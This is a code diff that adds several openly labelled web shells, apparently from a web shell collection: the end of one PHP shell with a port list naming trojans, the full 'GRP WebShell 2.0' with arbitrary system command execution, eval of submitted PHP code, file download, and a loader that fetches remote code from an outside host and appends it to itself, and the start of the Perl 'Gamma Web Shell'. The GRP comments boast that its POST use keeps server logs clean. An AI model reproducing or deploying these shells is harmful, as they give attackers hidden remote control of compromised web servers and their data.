+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //Ïîâòîğåíèå ñèìâîëà
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}
+function ex($comd)                             //Âûïîëíåíèå êîìàíäû
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob
+
diff --git a/php/GRP WebShell 2.0 release build 2018 (C)2006,Great.php b/php/GRP WebShell 2.0 release build 2018 (C)2006,Great.php
new file mode 100644
index 0000000..5781cd4
--- /dev/null
+++ b/php/GRP WebShell 2.0 release build 2018 (C)2006,Great.php	
@@ -0,0 +1,575 @@
+<?php
+
+/*
+ * GReat's Post (GRP) web shell
+ * Shell uses POST queries to send data to the server, so logs on the webserver are absolutely clear ;)
+ *
+ * Coded by Great (C) 2006.
+ * All rights reserved
+ */
+
+// Config
+
+// Enable BASIC authorization
+$auth = 0;
+// You really don't need to turn it on
+$devel = 0;
+// Allow images?
+$images = 0;
+// If $images=1, set this variable equal to the base URL for the images folder.png & file.png
+$images_url = "http://localhost/";
+// Show errors?
+$errors = 1;
+// Modules path
+$modules_base = "http://cribble.by.ru/grp_mod/";
+// Modules supported
+$modules = array("browse" => "File browser", "mysql" => "MySQL");
+// Script version
+$script_release = "GRP WebShell 2.0 release build 2018 (C)2006,Great";
+
+// Authorization
+
+$name='63191e4ece37523c9fe6bb62a5e64d45';
+$pass='47ce56ef73da9dec757ef654e6aa1ca1';
+$caption="Enter your login and password";
+if ($auth &&  (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass))
+{
+	header("WWW-Authenticate: Basic realm=\"$caption\"");
+	header("HTTP/1.0 401 Unauthorized");
+	exit("<h1>Unauthorized access</h1>");
+}
+
+if($errors)
+  error_reporting(E_ALL&~E_NOTICE);
+else
+  error_reporting(0);
+
+// Strip slashes
+
+if(get_magic_quotes_gpc())
+{
+ foreach(array("_POST", "_GET", "_FILES", "_COOKIE") as $ar)
+  foreach($GLOBALS[$ar] as $k=>$v)
+    $GLOBALS[$ar][$k] = stripslashes($v);
+}
+
+// Useful functions
+
+// Print post form
+function post_form($name, $params, $a="", $b="")
+{
+  static $i=0;
+  echo "<form method='post' name='PostActForm$i'>\n";
+  foreach($params as $n=>$v)
+    echo "<input type='hidden' name='$n' value='$v'>\n";
+  echo "$a<a href='javascript:void(0);' onClick='document.PostActForm$i.submit()'>$name</a>$b</form>\n";
+  $i++;
+}
+
+// Print post form without confirmation link
+function post_empty_form($params)
+{
+  static $i=0;
+  echo "<form method='post' name='PostEmptyForm$i'>\n";
+  foreach($params as $n=>$v)
+    echo "<input type='hidden' name='$n' value='$v'>\n";
+  echo "</form>\n";
+  $i++;
+  return $i-1;
+}
+
+// Print single confirmation link
+function submit_empty_form($i, $name)
+{
+  echo "<a href='javascript:void(0);' onClick='document.PostEmptyForm$i.submit()'>$name</a>";
+}
+
+// Print single confirmation link with a confirmation message box
+function confirm_empty_form($i, $name, $msg)
+{
+  echo "<a href='javascript:void(0);' onClick='if(confirm(\"$msg\")){document.PostEmptyForm$i.submit()}'>$name</a>";
+}
+
+// Redirect to URL $to
+function redirect($to)
+{
+  echo "<meta http-equiv=\"refresh\" content=\"0;url='$to'\">";
+}
+
+// Get string containing file permissions in the form 'lrwxrwxrwx'
+function filesperms($file)
+{
+	$perms = fileperms($file);
+
+	if (($perms & 0xC000) == 0xC000) {
+	   // Socket
+	   $info = 's';
+	} elseif (($perms & 0xA000) == 0xA000) {
+	   // Symbolic Link
+	   $info = 'l';
+	} elseif (($perms & 0x8000) == 0x8000) {
+	   // Regular
+	   $info = '-';
+	} elseif (($perms & 0x6000) == 0x6000) {
+	   // Block special
+	   $info = 'b';
+	} elseif (($perms & 0x4000) == 0x4000) {
+	   // Directory
+	   $info = 'd';
+	} elseif (($perms & 0x2000) == 0x2000) {
+	   // Character special
+	   $info = 'c';
+	} elseif (($perms & 0x1000) == 0x1000) {
+	   // FIFO pipe
+	   $info = 'p';
+	} else {
+	   // Unknown
+	   $info = 'u';
+	}
+
+	// Owner
+	$info .= (($perms & 0x0100) ? 'r' : '-');
+	$info .= (($perms & 0x0080) ? 'w' : '-');
+	$info .= (($perms & 0x0040) ?
+	           (($perms & 0x0800) ? 's' : 'x' ) :
+	           (($perms & 0x0800) ? 'S' : '-'));
+
+	// Group
+	$info .= (($perms & 0x0020) ? 'r' : '-');
+	$info .= (($perms & 0x0010) ? 'w' : '-');
+	$info .= (($perms & 0x0008) ?
+	           (($perms & 0x0400) ? 's' : 'x' ) :
+	           (($perms & 0x0400) ? 'S' : '-'));
+
+	// World
+	$info .= (($perms & 0x0004) ? 'r' : '-');
+	$info .= (($perms & 0x0002) ? 'w' : '-');
+	$info .= (($perms & 0x0001) ?
+	           (($perms & 0x0200) ? 't' : 'x' ) :
+	           (($perms & 0x0200) ? 'T' : '-'));
+	return $info;
+}
+
+// Get string contaning file modification time
+function filesmtime($file)
+{
+  return date ("d M Y H:i:s", filemtime($file));
+}
+
+function headers()
+{
+return "{$_SERVER['REQUEST_METHOD']} {$_SERVER['PHP_SELF']} {$_SERVER['SERVER_PROTOCOL']}\\n
+Accept: {$_SERVER['HTTP_ACCEPT']}\\n
+Accept-Charset: {$_SERVER['HTTP_ACCEPT_CHARSET']}\\n
+Accept-Encoding: {$_SERVER['HTTP_ACCEPT_ENCODING']}\\n
+Accept-Language: {$_SERVER['HTTP_ACCEPT_LANGUAGE']}\\n
+Cache-Control: {$_SERVER['HTTP_CACHE_CONTROL']}\\n
+Connection: {$_SERVER['HTTP_CONNECTION']}\\n
+Host: {$_SERVER['HTTP_HOST']}\\n
+User-Agent: {$_SERVER['HTTP_USER_AGENT']}\\n
+";
+}
+
+if($_POST['act']=='toolz' && $_POST['subact']=='phpinfo')
+  die(phpinfo());
+
+if($_POST['act']=='downfile')
+{
+  $curdir = $_POST['curdir'];
+  $file = $_POST['file'];
+
+  if(!file_exists($curdir.'/'.$file))
+    die("Cannot find file ".$curdir.'/'.$file);
+  if(!is_file($curdir.'/'.$file))
+    die($curdir.'/'.$file." is not a regular file");
+
+  Header("Content-Type: application/x-octet-stream");
+  Header("Content-Disposition: attachement;filename=".$file);
+
+  die(join('', file($curdir.'/'.$file)));
+}
+
+if($_POST['act']=='preview')
+{
+  chdir($_POST['curdir']);
+  if(!file_exists($_POST['file']))
+    die("Can't find file");
+  $p=explode(".",$_POST['file']);
+  $ext=strtolower($p[count($p)-1]);
+  if(in_array($ext, array('png','jpg','jpeg','bmp','gif','tiff','pcx')))
+    Header("Content-Type: image/$ext");
+  elseif(in_array($ext, array('htm', 'html','plg')))
+    Header("Content-Type: text/html");
+  elseif(in_array($ext, array('php')))
+  { include($_POST['file']); die;}
+  else
+    Header("Content-Type: text/plain");
+  @readfile($_POST['file']);
+  die;
+}
+
+//---------------------------------
+// Headers
+//---------------------------------
+?>
+<html>
+<head>
+<title><?php echo $script_release;?></title>
+<style type='text/css'>
+A { text-decoration: none; color: white }
+</style>
+</head>
+<body bgcolor='black' vlink='blue' alink='blue' link='blue' text='white'>
+<noscript><br><br><br><h1 align='center'><font color='red'>You need JavaScript to be enabled to run this page!</font></h1><br><br><br></noscript>
+<?php // Navigation ?>
+<center>
+<table border=0 width=100%><tr><td><table border=0><tr>
+<form method='post' name='main_empty_form'><input type='hidden' name='act'><input type='hidden' name='curdir'><input type='hidden' name='file'><input type='hidden' name='subact'></form>
+<?php
+echo "<td><b>";
+post_form("Shell", array(), "", " |");
+
+$mod_loaded = array();
+foreach($modules as $module=>$name)
+{
+  if(function_exists("mod_".$module))
+  {
+    echo "</b><td><b>";
+    post_form($name, array("act" => $module), "", " |");
+    $mod_loaded[] = $module;
+  }
+}
+
+echo "</b><td><b>";
+post_form("Toolz", array("act" => "toolz"));
+
+echo "</table><td align=right width=50%>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<table style='border: 1px solid' width=100%><tr><td>";
+echo "<b>Modules installed:</b>&nbsp;&nbsp;&nbsp;";
+$first = 1;
+foreach($mod_loaded as $module)
+{
+  if(!$first)
+    echo ", ";
+  if($module==$_POST['act'])
+    echo "<b>".$module."</b>";
+  else
+    echo $module;
+  $first=0;
+}
+if($first==1)
+  echo "None";
+?>
+<td align=right>
+<?php
+if(file_exists("grp_repair.php"))
+  echo "<input type='button' value='Repair' onClick='window.top.location.href=\"grp_repair.php\";' /><input type='button' value='Delete Repair' onClick='window.top.location.href=\"grp_repair.php?delete\";' /> ";
+?>
+<input type='button' value='Load more...' onClick='document.main_empty_form.act.value="load_modules";document.main_empty_form.submit();' />
+</table></table>
+</center>
+<p>
+<table border=0>
+<tr><td>
+<table style='border: 1px solid' cellspacing=5>
+<tr><td colspan=2 align='center'><b>Server information</b>
+<tr><td>
+<?php
+$os = "unk";
+$safe = @ini_get("safe_mode");
+
+if($safe==1)
+{
+	echo "<b>Safe Mode</b>&nbsp;&nbsp;<td>On<tr><td>";
+}
+else
+{
+	echo "<b>Operating system</b>&nbsp;&nbsp;<td>";
+	$ver = exec("ver");
+	if(substr($ver, 0, 9) == "Microsoft")
+	{
+	  echo $ver;
+	  $os = "win";
+	}
+	else
+	{
+	  $id = exec("id");
+	  if(substr($id, 0, 3) == "uid")
+	  {
+	    echo exec("uname -srn");
+	    $os = "nix";
+	  }
+	  else
+	    echo "Unknown, not a Windows ";
+	}
+	
+	if($os == "nix")
+	{
+	  echo "<tr><td><b>id<b>&nbsp;&nbsp;<td>".exec("id")."</tr>";
+	}
+}
+echo "<tr><td><b>Server software</b>&nbsp;&nbsp;<td>{$_SERVER['SERVER_SOFTWARE']}";
+
+if($os == "nix")
+{
+  $pwd = exec("pwd");
+  $defcmd = "ls -liaF";
+}
+elseif($os == "win")
+{
+  $pwd = exec("cd");
+  $defcmd = "dir";
+}
+
+if(empty($pwd))
+  $pwd = getcwd();
+
+?>
+</table>
+<td>
+<table style='border: 1px solid' cellspacing=5>
+<tr><td colspan=2 align='center'><b>Client information</b>
+<tr><td><b>Client's IP</b>&nbsp;&nbsp;<td><a href="javascript:alert('Host: <?php echo gethostbyname($_SERVER['REMOTE_ADDR']); ?>');"><?php echo $_SERVER['REMOTE_ADDR'];?></a>
+<tr><td><b>Client's browser</b>&nbsp;&nbsp;<td><a href="javascript: alert('HTTP Headers:\n\n<?php echo headers(); ?>');"><?php echo htmlspecialchars($_SERVER['HTTP_USER_AGENT']);?></a>
+</table>
+</table>
+<p>
+<?php
+//---------------------------------
+// Parse parameters. Initializing.
+//---------------------------------
+
+// Register globals
+if (ini_get('register_globals') != '1')
+{
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+//---------------------------------
+// Select action
+//---------------------------------
+
+
+// Toolz
+if($_POST['act'] == 'toolz')
+{
+?>
+<h3>Tools</h3>
+<?php
+$n1 = post_empty_form(array("act" => "toolz", "subact" => "phpinfo"));
+$n2 = post_empty_form(array("act" => "toolz", "subact" => "phpcode"));
+?>
+<ul>
+<li><?php submit_empty_form($n1, "Phpinfo"); ?>
+<li><?php submit_empty_form($n2, "Evaluate php code"); ?>
+</ul>
+<?php
+
+if($_POST['subact'] == "phpcode")
+{
+  if(!isset($_POST['code']))
+    $_POST['code'] = 'print_r($_SERVER);';
+  echo "<br /><form method='post' name='phpcode'>
+        <input type='hidden' name='act' value='toolz'>
+        <input type='hidden' name='subact' value='phpcode'>
+        <input type='checkbox' name='pre'".(($_POST['pre']=="on")?" checked":"").">
+         <a href=\"javascript:void(0);\" onClick=\"document.phpcode.pre.checked=!document.phpcode.pre.checked\">Append &lt;pre&gt; tags</a><br>
+        <textarea name='code' cols=70 rows=20>{$_POST['code']}</textarea>
+        <br />
+        <input type='submit' name='go' value='Eval'>
+        </form>";
+  if(isset($_POST['go']))
+  {
+    echo "<p>Result is:<br />";
+    if($_POST['pre']=="on")
+    {
+      echo "<pre>";
+      eval($_POST['code']);
+      echo "</pre>";
+    }
+    else
+      echo eval($_POST['code']);
+  }
+
+}
+?>
+</ul>
+<?php
+}
+
+elseif(function_exists("mod_".$_POST['act']))
+{
+  eval("mod_".$_POST['act']."();");
+}
+
+elseif($_POST['act']=="load_modules")
+{
+  echo "<h3>Module loader</h3>";
+  if($_POST['subact']=='autoload')
+  {
+    $mod = join('', file($modules_base."mod_".$_POST['module'].".txt"));
+    if($mod===false)
+      die("Module is unavailable");
+    //echo "Module:<br><textarea cols=50 rows=10 readonly>".htmlspecialchars($mod)."</textarea>";
+    $parts = explode('/', $_SERVER['PHP_SELF']);
+    $name = $parts[count($parts)-1];
+
+    // Backup
+    copy($name, "~".$name);
+
+    $f = fopen("grp_repair.php", "w");
+    if($f)
+    {
+      $crlf = "\r\n";
+      fwrite($f, '<?php'.$crlf.'$name="'.$name.'";'.$crlf.'if($_SERVER[QUERY_STRING]=="delete") {unlink("grp_repair.php");unlink("~".$name);}else{'.$crlf.'unlink($name);'.$crlf.'rename("~".$name, $name);'.$crlf.'unlink("grp_repair.php");}'.$crlf.'?>'."<meta http-equiv=\"refresh\" content=\"0;url='$name'\">");
+      fclose($f);
+      $repair=1;
+    }
+    else $repair=0;
+
+    $sh = fopen($name, "a+") or die("Can't open ".$name." to append module");;
+    fwrite($sh, $mod);
+    fclose($sh);
+    echo "<b><font color='green'>Module installed successfully</font></b><br /><b>WARNING!</b> Shell file has been backuped. If you'll have problems with installed module, you can ";
+    if($repair)
+      echo "run 'grp_repair.php' to forget changes";
+    else
+      echo "backup file manually from '~".$name."' (shell was unable to create self-repairing module)";
+    echo "<br /><small>You'll be automatically redirected in 3 seconds</small><meta http-equiv=\"refresh\" content=\"3;url=''\">";
+  }
+
+  else
+  {
+    echo "<b>Supported modules are</b>: ";
+    $first = 1;
+    foreach($modules as $module=>$name)
+    {
+      if(!$first)
+        echo ", ";
+      echo $name." (".$module.")";
+      $first=0;
+    }
+    if($first==1)
+      echo "None";
+    echo "<br /><b>Modules base load URL</b>: $modules_base<p><font color='gray'><b>Modules can be installed:</b></font>
+          (<font color='green'>Ready</font>, <font color='red'>Failure</font>)<br />";
+    foreach($modules as $module=>$name)
+    {
+      $mod_form[$module] = post_empty_form(array('act' => 'load_modules', 'subact' => 'autoload', 'module' => $module));
+    }
+    echo "<table border=0>";
+    foreach($modules as $module=>$name)
+    {
+      $pre  = "<font color='green'>";
+      $post = "</font>";
+      $mod = @join('', @file($modules_base."mod_".$module.".txt"));
+      if(!preg_match("#function mod_#i", $mod))
+        $pre  = "<font color='red'>";
+
+      echo "<tr><td>".$pre.$name." (".$module.")".$post."<td><a href='".$modules_base."mod_".$module.".txt' target=_blank>[SOURCE]</a><td>";
+
+      if(function_exists("mod_".$module))
+        echo "<font color='gray'>[ALREADY INSTALLED]</font>";
+      elseif($pre == "<font color='green'>")
+        submit_empty_form($mod_form[$module], "[INSTALL]");
+      else
+        echo "<font color='gray'>[CAN'T INSTALL]</font>";
+      echo "</tr>";
+    }
+    echo "</table>";
+  }
+}
+
+// Shell
+else
+{
+	// First we check if there has been asked for a working directory
+	if (!empty($work_dir)) {
+	  // A workdir has been asked for
+	  if (!empty($command)) {
+	    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+	      // We try and match a cd command
+	      if ($regs[1][0] == '/') {
+	        $new_dir = $regs[1]; // 'cd /something/...'
+	      } else {
+	        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+	      }
+	      if (file_exists($new_dir) && is_dir($new_dir)) {
+	        $work_dir = $new_dir;
+	      }
+	      unset($command);
+	    }
+	  }
+	}
+
+unset($curdir);
+if($safe == 1)
+{
+  die("<font color='red'><b>Safe mode is turned On! Command line is unavailable</b></font>");
+}
+
+if(isset($_POST["curdir"]))
+  $curdir = $_POST["curdir"];
+else
+  $curdir = $pwd;
+if($os == "win")
+  $curdir = str_replace("/", "\\", $curdir);
+?>
+<form name="execform" method="post">
+<table border=0>
+<tr><td>Command: <td><input type="text" name="command" size="60" value="<?php echo ($_POST["command"]=="")?$defcmd:$_POST["command"];?>">
+    <td><a href="#" onClick="document.execform.command.value='<?php echo $defcmd;?>'">Set default [<?php echo $defcmd; ?>]</a>
+<tr><td><a href="#" onClick="document.execform.stderr.checked=!document.execform.stderr.checked">Disable stderr-grabbing?</a><td><input type="checkbox" name="stderr"<?php echo ($_POST["stderr"]=="on")?" checked":"";?>>
+<tr><td>Working directory:<td><input type="text" name="curdir" size="60" value="<?php echo $curdir;?>">
+    <td><a href="#" onClick="document.execform.curdir.value='<?php echo addslashes($pwd);?>'">Restore as home directory [<?php echo htmlspecialchars($pwd); ?>]</a>
+<tr><td colspan=2><input name="submit_btn" type="submit" value="Execute Command">
+</table>
+</form>
+<textarea cols="80" rows="29" readonly>
+<?php
+function excmd($cmd)
+{
+  if(function_exists("system"))
+  { system($cmd); return true; }
+  if(function_exists("exec"))
+  { exec($cmd, $var); echo join("\n", $var); return true; }
+  if(function_exists("passthru"))
+  { passthru($cmd); return true; }
+  return false;
+}
+if (!empty($command)) {
+  if (!$stderr)
+    $command .= " 2>&1";
+  if($os == "nix")
+    excmd("cd $curdir; $command");
+  elseif($os == "win")
+    excmd("cd $curdir & $command");
+  elseif($os == "unk")
+  {
+    chdir($curdir);
+    excmd($command);
+  }
+}
+?>
+</textarea>
+</form>
+<script language="JavaScript" type="text/javascript">
+document.execform.command.focus();
+</script>
+<?php
+}
+
+//---------------------------------
+// Footer
+//---------------------------------
+?>
+</body>
+</html>
+
+<?php // Is it really very interesting? :) ?>
diff --git a/php/Gamma Web Shell.php b/php/Gamma Web Shell.php
new file mode 100644
index 0000000..11adf5a
--- /dev/null
+++ b/php/Gamma Web Shell.php	
@@ -0,0 +1,869 @@
+#!/usr/bin/perl
+###############################################################################
+### Gamma Web Shell
+### Copyright 2003 Gamma Group
+### All rights reserved
+###
+### Gamma Web Shell is free for both commercial and non commercial
+### use. You may modify this script as you find necessary as long
+### as you do not sell it. Redistribution is not allowed without
+### prior consent from Gamma Group (support@gammacenter.com).
+### 
+### Gamma Group <http://www.gammacenter.com>
+###
+
+use strict;
+
+###############################################################################
+
+package WebShell::Configuration;
+
+use vars qw($password $restricted_mode $ok_commands);
+
+##
+## Password.
+## Set to blank if you don't need password protection.
+##
+$password = "changeme";
+
+##
+## Restricted mode.
+## Set to "1" to allow only a limited set of commands.
+##
+$restricted_mode = 0;
+
+##
+## Available commands.
+## The list of available commands for the restricted mode.
+##
+$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];
+
+###############################################################################
+
+package WebShell::Templates;
+
+use vars qw($LOGIN_TEMPLATE $INPUT_TEMPLATE $EXECUTE_TEMPLATE $BROWSE_TEMPLATE);
+
+my $VERSION = 'Gamma Web Shell 1.3';
+
+my $STYLESHEET = <<EOT;
+body {
+  font-family: Verdana, Helvetica, sans-serif;
+  font-size: 90%;
+  color: #000;
+  background: #FFF;
+  margin: 0px;
+  padding: 0px;
+}
+
+h1, h2, h3, h4, h5, h6 {
+  margin: 0.3em;
+  padding: 0px;
+}
+
+input, select, textarea, select {
+  font-family: Verdana, Helvetica, sans-serif;
+  font-size: 100%;
+  margin: 1px;
+  padding: 0px 1px;
+}
+
+pre, code, tt {
+  font-family: 'Courier New', Courier, monospace;
+  font-size: 100%;
+}
+
+form {
+  margin: 0px;
+  padding: 0px;
+}
+
+table {
+  font-size: 100%;
+}
+
+a {
+  text-decoration: none;
+  color: #000;
+  background: transparent;
+}
+
+a:hover {
+  text-decoration: underline;
+}
+
+.header, .footer {
+  color: #000;
+  background: #CCF;
+  margin: 0px;
+  padding: 0px;
+  text-align: center;
+  border: solid #000;
+  border-width: 1px 0px;
+}
+
+.box {
+  border: 1px solid #000;
+  border-collapse: collapse;
+  color: #000;
+  background: #CCF;
+}
+
+.box-header, .box-content, .box-text, .box-error, .box-menu {
+  border: 1px solid #000;
+}
+
+.box-header, .box-header a {
+  color: #FFF;
+  background: #000;
+}
+
+.box-content {
+  text-align: center;
+}
+
+.box-text {
+  padding: 3px 10px;
+  font-size: 90%;
+}
+
+.box-menu {
+  padding: 3px 10px;
+}
+
+.box-error {
+  color: #FFF;
+  background: #F00;
+  font-weight: bold;
+  padding: 3px 25px;
+  text-align: center;
+}
+
+.dialog {
+  text-align: left;
+  border-collapse: collapse;
+}
+
+.dialog-even {
+  color: #000;
+  background: #CCF;
+}
+
+.dialog-odd {
+  color: #000;
+  background: #AAE;
+}
+
+.menu {
+  font-weight: normal;
+}
+
+.menu-selected {
+  font-weight: bold;
+}
+
+.tool {
+  background: transparent;
+  color: #000;
+  border-style: hidden;
+  border-width: 1px;
+  text-decoration: none;
+}
+
+.tool:hover {
+  border-style: outset;
+  text-decoration: none;
+}
+
+.output {
+  color: #FFF;
+  background: #000;
+  padding: 1em;
+  font-weight: bold;
+}
+
+.output-text {
+}
+
+.output-command {
+  color: #FF7;
+  background: #000;
+}
+
+.output-error {
+  color: #FFF;
+  background: #F00;
+}
+
+.entries {
+  border: 1px solid #777;
+  border-collapse: collapse;
+}
+
+.entries td, .entries th {
+  padding: 2px 10px;
+}
+
+.entries th, .entries td {
+  border: 1px solid #777;
+}
+
+.entries-even {
+    color: #FFF;
+    background: #444;
+}
+
+.entry-dir a {
+  color: #BBF;
+  background: transparent;
+}
+
+.entry-exec {
+  color: #BFB;
+  background: transparent;
+}
+
+.entry-file {
+}
+
+.entry-mine {
+}
+
+.entry-alien {
+  color: #FBB;
